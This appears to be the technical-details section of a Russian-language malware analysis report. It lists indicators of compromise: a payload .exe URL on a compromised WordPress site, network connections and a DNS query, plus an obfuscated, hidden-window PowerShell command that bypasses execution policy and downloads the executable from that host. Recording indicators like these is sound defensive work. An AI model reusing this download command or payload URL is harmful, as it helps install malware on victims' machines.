Техническая информация
- http://warnercamp.com/wp-includes/pkskkcin/nb0o37bw.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWE^RShel^l.eXE -^e^Xe^CuT^IO^NP^ol^icY^ ^Byp^AS^s ^-^Nopr^oFi^Le^ ^-win^DOWsT^y^Le ^Hi^Dde^n^ ^(NEw-OBJeCt^ sYs^tEM.^nEt.WebcL^iE^N^T).^DOWNloAdFI^le('http://warnercamp.com...
- 'wa###rcamp.com':80
- 'wa###rcamp.com':443
- http://wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
- http://www.wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
- 'wa###rcamp.com':443
- DNS ASK wa###rcamp.com
- '<SYSTEM32>\cmd.exe' /C "PoWE^RShel^l.eXE -^e^Xe^CuT^IO^NP^ol^icY^ ^Byp^AS^s ^-^Nopr^oFi^Le^ ^-win^DOWsT^y^Le ^Hi^Dde^n^ ^(NEw-OBJeCt^ sYs^tEM.^nEt.WebcL^iE^N^T).^DOWNloAdFI^le('http://warnercamp.com...' (со скрытым окном)